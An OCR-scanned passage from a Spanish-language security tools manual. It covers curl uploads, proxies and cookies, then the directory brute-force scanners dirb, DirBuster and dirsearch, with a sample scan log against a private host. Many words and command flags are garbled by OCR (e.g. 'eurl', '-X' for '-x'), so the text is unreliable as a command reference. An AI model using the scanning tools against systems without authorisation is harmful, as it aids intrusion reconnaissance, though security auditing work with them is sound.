IMAP, IMAPS, SCP, SETP, SMB, SMBS, SMTP, SMTPS y TFTP 

POST 

POST es el método HTTP que se inventó para enviar datos a una aplieaeión web reeeptora y es 
eomo funeionan los formularios HTME más eomunes en la web. Por lo general se envia un 
fragmento de un tamaño relativamente pequeño de datos al reeeptor. El tipo de subida generalmente 
se realiza eon las opeiones -d o —data, pero hay algunas alteraeiones adieionales. 

multípart formpost 

Eos formpost multipart también se utilizan en los formularios HTME de sitios web, normalmente 
euando hay un arehivo a subir. Este tipo de earga también es una POST HTTP pero envia los datos 
formateados de aeuerdo eon algunas reglas espeeiales, que es lo que signifiea el nombre multipart. 
Dado que se envian los datos eon un formato eompletamente diferente, no se puede seleeeionar que 
tipo de POST a usar a su propio antojo, sino que depende eompletamente de lo que el servidor 
reeeptor espera y puede manejar. Eos formpost multipart HTTP se realizan eon la opeión -F 



PUT 

HTTP PUT es el tipo de subida que se diseñó para enviar un reeurso completo que es destinado a 
colocarse tal cual en el sitio remoto o incluso reemplazar un recurso allí existente, este es también el 
método de subida menos utilizado para HTTP en la web, ya que la mayoría de los servidores web ni 
siquiera lo tienen habilitado. 

Para efectuar una subida HTTP, usar la opción -T con el nombre del archivo a subir; 
curl -T uploadthis http://example.com/ 

Subidas FTP 

Trabajando con FTP, se puede ver el sistema de archivos remoto al que se accede. Se le dice al 
servidor exactamente en que directorio desea colocar el fichero y que nombre de archivo 
utilizar. Si se especifica la URL de subida con una barra inclinada final, curl agregará el nombre del 
archivo utilizado localmente a la URL y luego este será el nombre del archivo utilizado cuando se 
almacena de forma remota: 

curl -T uploadthis ftp;//example.com/this/directory/ 

Entonces si se prefiere seleccionar un nombre de archivo diferente en el lado remoto que el que ha 
utilizado localmente, se ha de especificar en la URL; 

curl -T uploadthis ftp://example.com/this/directory/remotename 

Subidas SMTP 

Es posible que no se considere que enviar un correo electrónico sea subirlo, pero sí lo es. Se sube el 
cuerpo del correo al servidor SMTP. Con SMTP, también se deben incluir todos los encabezados de 
correo electrónico necesarios (To :, Erom ;, Data :, etc.) en el cuerpo del correo, ya que curl no 
agregará ninguno. 

curl -T mail smtp;//mail. example.com/ —mail-from user@example.com 

Limitando la velocidad 

Ea limitación de velocidad funciona exactamente igual para las subidas que para las descargas y de 
hecho curl solo tiene un límite único que limitará la velocidad en ambas direcciones. 

37.5. FTP 

ETP, Eile Transfer Protocol, es probablemente el protocolo de red más antiguo que admite curl y 
fue creado a principios de los años 1970. Ea especificación oficial es todavía la documentación 
REC959 de 1985, publicado una década antes del primer lanzamiento de curl. El protocolo ETP es 
un protocolo de comando y respuesta. El cliente envía un comando y el servidor responde. Si se usa 
la opción -V, se verán todos los comandos y las respuestas durante una transferencia. 

Para una transferencia ordinaria, hay como de 5 a 8 comandos necesarios para enviar y otras tantas 
respuestas para esperar y leer. Quizás no sea necesario decir que si el servidor está en un ubicación 
remota, habrá mucho tiempo esperando que pase el ping pong antes de la transferencia de archivos 
real se puede configurar y comenzar. Para archivos pequeños, los comandos iniciales pueden muy 
bien llevar más tiempo que la transferencia de datos real. 

Modo de transferencia 

Cuando un cliente ETP está a punto de transferir datos, especifica al servidor que modo de 
transferencia quisiera usar. Eos 2 modos de transferencia de curl soportados son ASCII y BINARY. 
ASCII es básicamente para texto y generalmente significa que el servidor enviará los archivos con 
los finales de líneas convertidos, mientras que binario significa enviar los datos sin alteración y 
asumir que el archivo no es texto, curl pasará de manera predeterminada al modo de transferencia 
binaria para ETP y para solicitar el modo ASCII, se usará la opción -B/ — use-ascii o asegurándose 



de que la URL termine eon ;type = A. 


Autenticación 

FTP es uno de los protoeolos a los que normalmente se aeeede sin un nombre de usuario y 
eontraseña. Simplemente sucede que para los sistemas que permiten el acceso FTP anónimo, se 
puede iniciar la sesión con casi cualquier nombre y contraseña. Cuando curl se usa en una URL FTP 
para realizar transferencias sin ningún nombre de usuario o contraseña, se utiliza el nombre 
anonymous con la contraseña ftp@example.com 

Si se desea proporcionar otro nombre de usuario y contraseña, se puede pasar a curl con la opción 
-u, -user o insertar la información en la URL de la forma siguiente: 
curl —user daniel: secret ftp://example.com/download 
curl ftp:// daniel:secret@example.com/download 

Conexiones activas 

El cliente puede optar por pedir al servidor que se conecte con el cliente para configurarlo, lo que se 
denomina conexión activa. Esto se hace con los comandos PORT o EPRT. Permitir que un 
dispositivo remoto se conecte de nuevo a un cliente en un puerto que el cliente abre, requiere que no 
haya cortafuegos u otro dispositivo de red intermedio que no deje pasar. Solicita una transferencia 
activa usando la opción -P [arg], también conocido como —ftpport en forma larga y aunque la 
opción le permite especificar exactamente que dirección usar, solo configura lo mismo de donde 
viene es casi siempre la elección correcta y lo hace con -P -, de esta manera para pedir un archivo, 
ejecutar: 

curl -P - ftp://example.com/ foobar.txt 

También puede solicitar explicitamente a curl que no use EPRT que es un comando un poco más 
nuevo que PORT con la opción —no-epsv de la linea de comandos. 

Conexiones pasivas 

Por defecto curl pide una conexión pasiva, lo que significa que envia un comando PASV o EPSV al 
servidor y luego el servidor abre un nuevo puerto para la segunda conexión al que luego se conecta 
curl. Eas conexiones salientes a un nuevo puerto son generalmente más fáciles y menos restringidas 
para los usuarios finales y clientes, pero luego requiere que la red en el extremo del servidor 
lo permita. Eas conexiones pasivas están habilitadas de forma predeterminada, pero si se ha 
activado anteriormente una conexión activa, se puede volver a pasiva con la opción —ftp-pasv 
También se puede pedir explicitamente a curl que no use EPSV, que es un comando un poco más 
nuevo que PASV, con la opción —no-epsv de la linea de comandos. 

A veces el servidor ejecuta una configuración original para que cuando curl emita el comando 
PASV y el servidor responde con una dirección IP para que curl se conecte, esta dirección es 
incorrecta y entonces curl no puede configurar la conexión de datos. En esta situación, se puede 
preguntar a curl que ignore la dirección IP mencionada en la respuesta PASV con la opción 
—ftp-skip-pasv-ip y en su lugar usar la misma dirección IP que tiene para la conexión de control 
incluso para la segunda conexión. 

Listado del directorio 

Se puede enumerar un directorio ETP remoto con curl asegurándose de que la URL termine con una 
barra oblicua final. Si la URL termina con una barra diagonal, curl supone que es un directorio que 
desea enumerar. Si en realidad no es un directorio, lo más probable es que en su lugar reciba un 
error. 

curl ftp ://ftp. example. c om/directory/ 

Con ETP no hay una sintaxis estándar para la salida del directorio que se devuelve con este tipo de 
comando que usa el comando ETP estándar LIST. La lista suele ser legible y perfectamente 



comprensible, pero algunos servidores devolverán el listado de maneras ligeramente diferentes. 

Para obtener solo una lista de todos los nombres en un directorio y asi evitar el formato especial de 
los listados de direetorio regulares, usar la opeión —list-only o simplemente -1. Después curl emite 
el eomando NLST FTP en su lugar: 

curl —list-only ftp://ftp.example.com/directory/ 

Subiendo con FTP 

Para subir un fichero en un servidor FTP, espeeificar la ruta y el nombre del archivo de destino 
completo en la URL y especifiear el nombre del archivo local a subir con -T, —upload-file. 
Opcionalmente finaliza la URL de destino con una barra inclinada y luego el componente de 
arehivo de la ruta local será agregado por eurl y se usa eomo nombre de archivo remoto. 

Como: 

curl - T localfile ftp://ftp.example.com/dir/path/remote-file 
o usar también el nombre del archivo local remotamente: 
curl - T localfile ftp://ftp.example.com/dir/path/ 

curl también admite globbing en el argumento -T para que pueda optar por subir fácilmente un 
rango o una serie de arehivos: 

curl - T image[l- 99J.jpg ftp: //ftp. example.com/upload/ 
o 

curl - T '{Huey, Dewey, Louie}.jpg' ftp://ftp.example.com/nephews/ 

37.6. SMTP 

eurl admite el envió de datos a un servidor SMTP, que eombinado con el conjunto correcto de las 
opeiones de linea de eomando hace que se envie un correo eleetrónieo a un conjunto de reeeptores 
de su eleeción. Al enviar SMTP eon eurl, hay 2 opeiones de linea de eomando necesarias que deben 
ser usadas. 

• Debe deeirle al servidor al menos un destinatario eon —mail-rept. Se puede usar esta opeión 
varias veees y luego curl le dirá al servidor que todas estas direcciones de correo electrónico 
deberian recibir el correo eleetrónieo. 

• Debe deeirle al servidor que dirección de correo eleetrónieo es el remitente del correo 
eleetrónieo con —mailfrom. Es importante darse cuenta de que esta direceión de correo 
electrónico no es neeesariamente la misma como se muestra en la linea From: linea del texto 
del correo eleetrónieo. 

Luego debe proporeionar los datos de eorreo eleetrónieo reales. Este es un archivo de texto 
formateado de acuerdo eon la REC 5322. Es un eonjunto de eneabezados y un cuerpo. Tanto los 
eneabezados como el cuerpo deben estar eodificados correctamente. Eos encabezados generalmente 
incluyen To:, Erom:, Subjeet:, Date: etc. 

Una linea de comando básica para enviar un correo eleetrónieo es la siguiente: 

curl smtp://mail. example.com —mail-from myself@example.com —mail- rept 
receiver@example.com —upload-file email.txt 

Ejemplo de un fichero email.txt 

Erom: John Smith <john@example. com> 

To: Joe Smith <smith@example. oom> 

Subjeet: an example. com example email 
Date: Mon, 7 Nov 2016 08: 45: 16 
Dear Joe, 

Weleome to this example email. What a lovely day. 



La URL de SMTP 

La parte de ruta de una solicitud SMTP especifica el nombre del dispositivo que se presentará 
durante la comunicación con el servidor de correo. Si se omite la ruta, curl intentará descubrir el 
nombre del dispositivo de la computadora local y usar esto. Sin embargo esto puede no devolver el 
nombre del dominio totalmente calificado que requieren algunos servidores de correo y especificar 
esta ruta permite establecer un nombre alternativo, como el nombre de dominio completo de su 
máquina, que podría tener obtenido de una función externa como gethostname o getaddrinfo. 

Para conectarse al servidor de correo en mail.example.com y enviar el nombre del dispositivo de la 
computadora local en el comando HELO/ EHLO: 
curl smtp://mail. example.com 

También se puede usar siempre la opción -v para ver la comunicación cliente-servidor. 

En lugar de tener que enviar client.example.com en el comando HELO/EHLO al correo del servidor 
en el mail.example.com, se puede hacer: 

curl smtp://mail. example.com/client.example.com 

Cuando se envía un correo electrónico con un cliente de correo ordinario, primero se buscará un 
registro MX para un dominio concreto al que desea enviar un correo electrónico. Si se envía un 
correo electrónico ajoe@example.com, el cliente obtendrá los registros MX de example.com para 
saber que servidor de correo utilizar para enviar correos electrónicos a los usuarios de example.com. 
curl no realiza búsquedas MX por sí mismo. Si desea averiguar a que servidor enviar un correo 
electrónico para un dominio en particular, le recomendamos que lo descubra primero y luego llame 
a curl para usar estos servidores Las útiles herramientas de línea de comandos para obtener registros 
MX incluyen ’dig' y ’nslookup'. 

37.7. Proxies 

Un proxy es una máquina o software que hace algo en nuestro nombre, el cliente. También se puede 
ver como un intermediario que se sienta entre el cliente y el servidor que desea trabajar, con un 
intermediario al que se conecta en lugar del servidor remoto real. Se le preguntas al proxy la 
operación a realizar deseada por usted y luego se ejecutará y hará eso y luego devolverá los datos. 
Algunas redes están configuradas para requerir un proxy para que se pueda acceder a Internet o tal 
vez esta red especial que le interesa. El uso de proxies se introduce en la red por las personas y la 
administración que maneja la red por razones políticas o técnicas. 

Algunos entornos de red proporcionan varios servidores proxy diferentes que deberían usarse en 
diferentes situaciones y una forma muy personalizable de manejarlo que sea compatible con los 
navegadores se llama "proxy auto-config" o PAC. 

Un archivo PAC contiene una fúnción JavaScript que decide que proxy debería usarse para la 
conexión a una red determinada (URL) e incluso si no se debería usar ningún proxy. Normalmente 
la mayoría de navegadores leen el archivo PAC de una URL en la red local. Dado que curl no tiene 
capacidades JavaScript, curl no admite archivos PAC. Si el navegador y la red utiliza archivos PAC, 
la ruta más fácil hacia adelante suele ser leer el archivo PAC manualmente y averiguar el proxy que 
necesita especificar para ejecutar su línea de comando curl con éxito. 

Tipos de proxy 

curl admite varios tipos diferentes de servidores proxy. El tipo de proxy predeterminado es HTTP, 
por lo que si especifica un nombre de dispositivo proxy o dirección IP sin un parte del esquema, es 
decir la parte que a menudo se escribe como http: //, curl supone que es un proxy HTTP, curl 
también permite varias opciones diferentes para establecer el tipo de proxy en lugar de usar el 
prefijo del esquema. 



Proxy HTTP 

Un proxy HTTP es un proxy con el que el cliente habla HTTP para realizar la transferencia. Por 
defecto curl asumirá que un dispositivo con el que se usa la opción -x o —proxy es un proxy HTTP 
y a menos que también especifique un número de puerto, será el puerto 3128 predeterminado. Si se 
desea solicitar la página web example.com utilizando un proxy en 192.168.0.1 puerto 8080, la línea 
de comando sería: 

curl -X 192.168.0.1:8080 http:/example.com/ 

Si se habilita el modo verbose con -v cuando se habla con un proxy, se verá que curl se conecta 
al proxy en lugar del servidor remoto y verá que usa un poco diferente la línea de solicitud. 

HTTPS y proxy 

HTTPS fue diseñado para permitir y proporcionar privacidad segura de extremo a extremo desde 
cliente al servidor y viceversa. Para proporcionar esto al hablar con un proxy HTTP, el protocolo 
HTTP tiene una solicitud especial que curl usa para configurar un túnel a través del proxy que 
entonces puede encriptar y verificar. Este método HTTP se conoce como CONNECT. Cuando el 
proxy hace un túnel de datos cifrados a través del servidor remoto después de la configuración de 
un método CONNECT, el proxy no puede ver ni modificar el tráfico sin romper el 
cifrado: 

curl -X proxy.example.com: 80 https://example.com/ 

Protocolos no HTTP sobre un proxy HTTP 

Un proxy HTTP significa que el proxy habla HTTP. Eos proxies HTTP se utilizan principalmente 
para proxy HTTP pero también es bastante común que también admitan otros protocolos. En 
particular, ETP es comúnmente soportado. Cuando se habla ETP sobre un proxy HTTP, 
generalmente se hace pretendiendo más o menos que otro protocolo funcione como HTTP y le pide 
al proxy que obtenga esta URL, incluso si la URL no está usando HTTP. Esta distinción es 
importante porque significa que cuando se envía a través de un proxy HTTP, curl realmente no 
habla ETP a pesar de tener una URL ETP, por lo tanto las características específicas de ETP no 
funcionarán: 

curl -X http://proxy.example.com:80 ftp://ftp.example.com/file.txt 
Entonces lo que puede hacer en su lugar es hacer un túnel a través del proxy HTTP 

Túnel de proxy HTTP 

La mayoría de los proxies HTTP permiten a los clientes hacer un túnel a través de un servidor al 
otro lado. Esto es exactamente lo que se hace cada vez que usa HTTPS a través del proxy HTTP, un 
túnel a través de un proxy HTTP con curl usando -p o —proxytunnel. 

Cuando se usa HTTPS a través de un proxy, normalmente se conecta al HTTPS número de puerto 
TCP remoto predeterminado 443, por lo tanto encontrará la mayoría de los servidores proxy HTTP 
de la lista blanca y permitirá conexiones solo a los dispositivos en este número de puerto y quizás 
algunos otros. La mayoría de los servidores proxy negarán a los clientes la conexión a cualquier 
puerto aleatorio. 

Para establecer un túnel ETP, ejecutar lo siguiente: 

curl -p -X http://proxy.example.com:80 ftp://ftp.example.com/file.txt 
Para decir a curl que use HTTP/1.0 en su solicitud CONNECT emitida al proxy HTTP, se debe usar 
la opción —proxy 1.0 [proxy] en lugar de -x 

Tipos de SOCKS 

SOCKS es un protocolo utilizado para proxies y curl lo soporta, curl admite los SOCKS versión 4 y 
versión 5. Se puede seleccionar la versión específica de SOCKS utilizando la parte de esquema 
correcta para el dispositivo proxy dado con -x o especificarlo con una opción separada en lugar de 

-X 

SOCKS4 es para la versión 4 y SOCKS4a es para la versión 4 sin resolver el nombre del dispositivo 
localmente: 



curl -X socks4://proxy.example.com http://www.example.com/ 
curl —socks4 proxy.example.com http://www.example.com/ 

Las versiones S0CKS4a: 

curl -X socks4a: //proxy.example.com http://www.example.com/ 
curl —socks4a proxy.example.com http://www.example.com/ 

S0CKS5 es para la versión 5 y SOCKS5-hostname es para la versión 5 sin resolver el nombre del 
dispositivo localmente: 

curl -X socks5: //proxy.example.com http://www.example.com/ 
curl —socks5 proxy.example.com http://www.example.com/ 

Versiones SOCKS5-hostname. Esta envia el nombre del dispositivo al servidor de forma que no 
resuelve el nombre localmente: 

curl -X socksóh: //proxy.example.com http://www.example.com/ 
curl —socks5- hostname proxy. example.com http://www.example.com/ 

Autenticación 

Los proxies HTTP pueden requerir autenticación, por lo que curl debe proporcionar las credenciales 
correspondientes para que el proxy las pueda usar y si no lo hace, solo hará que el proxy devuelva 
respuestas HTTP utilizando el código 407. La autenticación para los servidores proxy es muy 
similar a la autenticación HTTP normal, pero es independiente de la autenticación del servidor para 
permitir que los clientes usen independientemente la autenticación del dispositivo y la autenticación 
del proxy. 

Con curl, se configura el nombre de usuario y la contraseña para la autenticación del proxy con 
la opción -U usuario: contraseña o —proxy-user usuario:contraseña 
curl -U danieksecrSt -x myproxy: 80 http://example.com 
Este ejemplo usará de manera predeterminada el esquema de autenticación básico. Algunos proxies 
requerirán otro esquema de autenticación y los encabezados que se devuelven cuando se obtiene 
una respuesta 407, le dirá cual y luego puede solicitar un método especifico con las opciones 
—proxydigest, —proxy-negotiate, —proxy-ntlm. Ahora el ejemplo anterior se escribiria de la manera 
siguiente para la autenticación NTLM con el proxy: 

curl -U danieksecrSt -x myproxy:80 http://example.com —proxy-ntlm 
También existe la opción mediante la cual curl debe descubrir que método quiere y soporta el proxy 
y luego seguir con esto usando la opción —proxy-anyauth. Para pedir a curl que use cualquier 
método que el proxy quiera como este, se ejecutará: 

curl -U danieksecrSt -x myproxy:80 http://example.com —proxy-anyauth 

Variables de entorno de proxy 

curl comprueba la existencia de variables de entorno especialmente nombradas antes de su 
ejecución para ver si se solicita que se use un proxy. El proxy se especifica estableciendo una 
variable llamada [scheme] _proxy que contiene el nombre del dispositivo proxy de la misma 
manera que se especifica el dispositivo con -x. Entonces si se quieres decir a curl que uses un proxy 
cuando accede a un servidor HTTP, se ha de configurar la variable de entorno http_proxy, como por 
ejemplo: 

http_proxy=http://proxy.example.com:80 
curl -V www.example.com 

Si bien el ejemplo anterior muestra el protocolo HTTP, también se puede configurar ftp_proxy, 
https_proxy, etc.. Todos estos nombres de variables de entorno proxy, excepto http_proxy, también 
se pueden especificar en mayúsculas, como HTTPS PROXY. 

Para establecer una sola variable que controle todos los protocolos, existe ALL PROXY. Si se 
especifica una variable de protocolo, esta tendrá prioridad. 


Al usar variables de entorno para configurar un proxy, se puede terminar fácilmente en una 



situación donde uno o algunos nombres de dispositivo deben exeluirse de pasar por el proxy. Esto 
se haee usando la variable NO PROXY. Estableeer esto en una lista de nombres de dispositivo 
separados por eomas que no debería usar un proxy euando se aeeede a él. Se puede eonfigurar 
NO_PROXY para que sea únieo asteriseo ('*') para que eoineida eon todos los dispositivos. 

37.8. Cookies 

Eas eookies HTTP son pares elave/valor que un eliente almaeena en un servidor. Son enviados de 
vuelta en solieitudes posteriores de aeuerdo eon la heuristiea, para permitir a los olientes mantener 
el estado entre solieitudes. Reoordar que el protooolo HTTP en si no tiene estado real sino que tiene 
que reenviar todos los datos en solieitudes posteriores que desea que el servidor tenga en ouenta. 

El servidor oonfigura las eookies eon el enoabezado Set-Cookie: y eon oada oookie el servidor 
envia un montón de propiedades adioionales que deben coinoidir para que el cliente envie la oookie 
de vuelta. Al igual que el nombre de dominio y la ruta, quizás lo más importante es ouanto tiempo 
debe vivir la oookie. 

Ea expiraoión de una oookie se estableoe en un tiempo fijo en el futuro o para vivir una serie de 
segundos o no expira nunoa. Lina cookie sin tiempo de caducidad se denomina session oookie y está 
destinado a vivir durante la sesión pero no por más tiempo. Lina sesión eon este aspeoto, 
normalmente piensa que es el tiempo de vida del navegador utilizado para maniobrar un sitio. 
Cuando se oierra el navegador, finaliza su sesión. Hacer operaciones HTTP contra un cliente eon la 
linea de oomando que admite cookies, plantea la pregunta euando una sesión realmente termina. 

Motor de cookies 

El oonoepto general de curl solo haee lo mínimo a menos que se lo diga de manera diferente y no 
reoonooe las eookies por defeoto. Se neoesita encender el motor de cookies para haoer que curl haga 
un seguimiento de las cookies que reeibe y luego enviarlas a las solieitudes que han eoineidido con 
ellas. Habilitar el motor de eookies es pedir a eurl que lea o eseriba eookies. Si se le diee a eurl que 
lea eookies de un arehivo no existente, solo eneenderá el motor pero eomenzará eon un almacén de 
eookies interno y vaeio: 

eurl -b non-existing http;//example.oom 

Pero solo eneender el motor de eookies, obtener un solo reeurso y no tendría sentido ya que eurl no 
tendría ninguna posibilidad de enviar las eookies que reeibió. Asumiendo el sitio en este ejemplo, 
estableeeria cookies y luego baria una redireeeión que se espeeifiearia de la forma siguiente: 
eurl -E -b non-existing http://example.eom 

Leyendo cookies de un fichero 

El formato de archivo que eurl usa para las eookies se llaman el formato de eookies de Netseape 
porque alguna vez fue el formato de arehivo utilizado por los navegadores y luego podría deeirle 
fáeilmente a eurl que use las eookies del navegador. 

También eurl admite un arehivo de cookie que es un eonjunto de encabezados HTTP que estableee 
cookies. Es un formato inferior, pero puede ser lo únieo que se tiene. 

Deeir a eurl de que arehivo leer de las eookies inieiales, se eseribiria de la forma siguiente: 
eurl -E -b eookies.txt http://example.eom 

Escribiendo cookies en un fichero 

El lugar donde se almaeenan las eookies a veees se denomina "oookie jar". Cuando se habilita el 
motor de eookies en eurl y se han reoibido eookies, se puede indioarle a eurl que desoargue todas 
sus eookies oonooidas en un arehivo, el oookie jar, antes de que exista. Es importante reoordar que 
curl solo actualiza el oookie jar de salida al salir y no durante su vida útil, no importa cuanto demore 
el manejo de las entradas dadas. 



Señalar la salida del eookie jar eon -e: 

eurl -e eookie-jar.txt http://example.eom 

-e es la opeión para eseribir eookies en un arehivo, -b es la opeión para leer eookies de un 
arehivo. A menudo se quieren los dos. 

Cuando eurl eseribe eookies en este arehivo, guardará todas las eookies eonoeidas, incluidas las que 
son eookies de sesión sin una vida útil determinada, eurl no tiene noción de una sesión y no sabe 
cuando termina una sesión para que no elimine las eookies de sesión a menos que se le indique. 



38. dirb 


dirb es un escáner de contenido web, busca objetos web existentes y/u ocultos. Básicamente 
funciona al lanzar un ataque basado en diccionario contra un servidor web y analizar la respuesta, 
dirb viene con un conjunto de listas de palabras de ataque preconfiguradas para un uso fácil, pero 
puede usar sus listas de palabras personalizadas. Además a veces dirb se puede usar como un 
escáner CGI clásico, pero es un escáner de contenido no un escáner de vulnerabilidades. 

El objetivo principal de dirb es ayudar en la auditoria profesional de aplicaciones web, 
especialmente en pruebas relacionadas con la seguridad. Cubre algunos agujeros no cubiertos por 
los escáneres de vulnerabilidad web clásicos, dirb busca objetos web especificos que otros 
escáneres genéricos CGI no pueden buscar. 

Uso; dirb <url_base> [<wordlist_file(s)>] [options] 

<url_base> : URL a escanear 

<wordlist file(s)> : Lista de palabras (wordfdel,wordfde2,wordfde3...) 

Teclas 


n 

Ir al directorio siguiente 

q 

Parar el escaneo 

r 

Estadísticas de escaneo restantes. 


Opciones 


-a <agent string> 

Especificar el USER_AGENT personalizado. 

-c <cookie string> 

Establece una cookie para la solicitud HTTP. 

-f 

Ajuste fino de la detección NOT_FOUND (404). 

-H <header string> 

Agregar un encabezado personalizado a la solicitud HTTP. 

-i 

Utilizar la búsqueda sin distinción entre mayúsculas y minúsculas. 

-1 

Imprimir el encabezado "Loaction" cuando se encuentre 

-N <nf code> 

Ignorar las respuestas con este código HTTP. 

-0 <output file> 

Guardar la salida en el fichero 

-p <proxy[;port]> 

Usar este proxy. El puerto predeterminado es 1080 

-P <proxy username: 
proxy_password> 

Autenticación proxy. 

-r 

No buscar recursivamente. 

-R 

Recursividad interactiva, pregunta por cada directorio 

-S 

Modo silencioso. 

-t 

No forzar un final'/' en las URL. 

-u <nombre de usuario: 
contraseña> 

Autenticación HTTP. 

-v 

Modo verbose 

-w 

No detener en los mensajes Warning 

-X <extensions> / 

-X <exts_file> 

Agrega cada palabra con estas extensiones. 





-z <milisecs> 

Agregar un retraso de milisegundos para no causar una inundación 


excesiva. | 


html2dic - Generar un diccionario de las páginas HTML 
Uso: ./html2dic <file> 

gendict - Generador de diccionarios a medida 
Uso: gendict -type pattem 
type: -n numeric [0-9] 

-c character [a-z] 

-C uppercase character [A-Z] 

-h hexa [0-f] 

-a alfanumeric [0-9a-z] 

-s case sensitive alfanumeric [0-9a-zA-Z] 

pattern: Must be an ascii string in which every 'X' character wildcard will be replaced with the 
incremental valué. 

Ejemplo 

Escanear http://l 92,168.1.224/ 

rooti^kali:-# dirb http://192.168. 1.224/ /usr/share/wordlists/dirb/common.txt 


DIRE v2.21 
By The Dark Raver 


START_TIME: Fri May 16 13:41:45 2014 
URL_BASE: http://192.168. 1.224/ 

WORDEIST FILES: /usr/share/wordlists/dirb/common.txt 


GENERATED WORDS: 4592 
— Scanning URL: http://192.168.L224/ — 

==> DIRECTORY: http://192.168. L224/.svn/ 

+ http://192.168. L224/.svn/entries (CODE:200|SIZE:2726) 
+ http://192.168.L224/cgi-bin/ (CODE:403|SIZE:1122) 
==> DIRECTORY: http://I92.I68.L224/config/ 

==> DIRECTORY: http://I92.I68.L224/docs/ 

==> DIRECTORY: http://I92.I68.L224/external/ 











39. DirBuster 


DirBuster intenta enumerar de forma recursiva los archivos y directorios ocultos. Una vez la 
enumeración está completa, DirBuster proporciona una función de informes que le permite exportar 
cualquier directorio y/o archivo identificado junto con los códigos de respuesta asociados a la 
solicitud. 

Los pasos a aseguir son 

• Establecer la URL de destino y el número de subprocesos 

• Seleccionar lista de posibles directorios y archivos 

• Iniciar escaneo de fuerza bruta 

• Generar el informe 

DirBuster es una mezcla de rastreador y forzador bruto; sigue todos los enlaces en las páginas que 
encuentra. Pero también intenta nombres diferentes para los posibles archivos. Estos nombres 
pueden estar en un archivo similar al que se usa o puede ser generado automáticamente por 
DirBuster usando la opción de "puré fuerza bruta” y el ajuste del conjunto de caracteres y las 
longitudes minima y máxima para las palabras generadas. 

Eos objetivos del proyecto DirBuster son los siguientes: 

• Producir una herramienta que asista en las pruebas de aplicación de caja negra, tratando de 
encontrar contenido oculto. 

• Asegurarse que la herramienta producida provea información de tal forma que cualquier 
falso positivo producido pueda ser identificado rápidamente. 

• Producir listas basadas en texto que puedan ser usadas por la herramienta mencionada. 

DirBuster tiene las siguientes caracteristicas: 

• Multi hilado ha sido registrado arriba de 6000 peticiones/segundo. 

• Eunciona con http y https 

• Busca directorios y archivos 

• Buscar recursivamente en los directorios que encuentre 

• Capaz de hacer escaneo basado en listas o fuerza bruta pura 

• DirBuster puede ser iniciado en cualquier directorio 

• Cabeceras HTTP personalizadas pueden ser agregadas 

• Soporte para proxy 

• Cambio automático entre peticiones HEAD y GET 

• Modo analizador de contenidos cuando intentos fallidos regresen como 200 

• Extensiones de archivos personalizadas pueden ser usadas 

• El desempeño puede ser ajustado mientras el programa esta en ejecución 

DirBuster viene con un conjunto único de listas de archivos y directorios, estas han sido generadas 
basadas en los nombres de archivo y directorio que son realmente usados por desarrolladores en 
sitios de Internet. El orden de las listas está basado en la frecuencia del elemento encontrado. Por lo 
tanto, los elementos mas comunes aparecen hasta arriba.Estas listas son las que hacen DirBuster. 

Para determinar si un archivo existe o no, DirBuster usa los códigos de respuesta del servidor. Las 
respuestas más comunes se enumeran a continuación: 

200. OK: el archivo existe y el usuario puede leerlo. 

404. Archivo no encontrado: el archivo no existe en el servidor. 




301. Movido permanentemente: esta es una redirección a una URL dada. 
401. No autorizado: se requiere autenticación para acceder a este archivo. 
403. Prohibido: la solicitud era válida pero el servidor se niega a responder. 

Para iniciar el Dirbuster, ejecutar dirbuster y aparecerá la pantalla siguiente 


Obviamente primero se deberá proporeionar la URL o la direeeión IP del sitio web desde el que 
desea obtener más informaeión. En esta URL se puede o no espeeifiear el puerto en el que desea 
espeeificar el eseaneo. El puerto 80 es el puerto principal utilizado por el sistema World Wide Web 
(www). Eos servidores web abren este puerto y luego escuchan las conexiones entrantes de los 
navegadores web. De manera similar, cuando un navegador web recibe una dirección remota, se 
supone que un servidor web remoto escuchará las conexiones en el puerto 80 en esta ubicación. 

Ea cantidad de subprocesos que se utilizarán para ejecutar el forzamiento bruto depende totalmente 
del hardware del ordenador. Un buen número es 20. 

A continuación seleccionar el método de trabajo: Use Get request only o Auto Switch(Head and 
Get). Después el tipo de eseaneo y tambiñen hay 2 opciones: Eist based brute forcé y Puré Brute 
Eorce. 

Ahora seleccionar el fichero con la lista de palabras a emplear para la fuerza bruta. En una carpeta 
DirBuster-list se encontrarán varios de ellos. Ver la imágen de la página siguiente. 

Otras opciones son: 

• Standard Start Point/URE Euzz 

• Activar o no Brute Eorce Dirs 

• Activar o no Brute Eorce Eiles 

• Activar o no Be recursive 

• Activar o no Use blank extensión 

• Escribir el directorio donde comenzar el eseaneo. Por defecto es la raíz / 

• Especificar la extensión de los ficheros a buscar. Por defecto es PHP, que son los ficheros 
más vulnerables probablemente. También asp, html y jsp 


Para iniciar el eseaneo en el sitio web, simplemente presione el botón Inicio en la GUI. En este 
paso, DirBuster intentará encontrar páginas / directorios ocultos y directorios dentro de la URL del 
proveedor, dando así otro vector de ataque, por ejemplo. Encontrar una página desvinculada a la 
administración. 

Una vez que finalice el análisis o lo detenga, se habilitará el botón Inform deshabilitado mientras se 
ejecuta el análisis. Con la ventana de informe, se pueden exportar las URL escaneadas de los 
directorios encontrados y archivos en diferentes formatos como texto plano, xml o csv. 
Simplemente complete el formulario y luego haga clic en Generar informe. 




40. Dirsearch 


Dirsearch es una herramienta de línea de comando simple diseñada para escanear directorios y 
archivos con fuerza bruta. 

Para ejecutarlo ir al subdirectorio dirsearch 

Uso: ./dirsearch.py [-u|—url] target [-e|—extensions] extensions [options] 

Opciones: 

-h, —help mostrar la ayuda y salir 


Obligatorio: 


-u URL, -url=URL 

URL objetivo 

-L URLLIST, -url-list=URLLIST 

Lista de URLs objetivos 

-e EXTENSIONS, 
-extensions=EXTENSIONS 

Lista de extensiones separadas por comas, p.e., 
php, asp, html, jsp 


Configuración del diccionario: 


-w WORDLIST, -wordlist=WORDLIST 

Lista de extensiones separadas por comas 

-1, —lowercase 


-f, —force-extensions 

Lorzar las extensiones para cada entrada de lista 
de palabras 


El wordlist que se puede emplear por ejemplo es el de DirBuster. 
Configuración general: 


-s DELAY, -delay=DELAY 

Retardo entre solicitudes 

-r, —recursive 

Euerza bruta recursiva 

—suppress-empty, —suppress-empty 


—scan-subdir=SCANSUBDIRS, —scan- 
subdirs=SCANSUBDIRS 

Escanear subdirectorios del -u —url dado 
separados por comas 

-exclude-subdir=EXCLUDESUBDIRS, 

-exclude-subdirs=EXCLUDESUBDIRS 

Excluir los siguientes subdirectorios durante el 
análisis recursivo separados por coma 

-t THREADSCOUNT, 
-threads=THREADSCOUNT 

Número de threads 

-X EXCLUDESTATUSCODES, -exclude- 
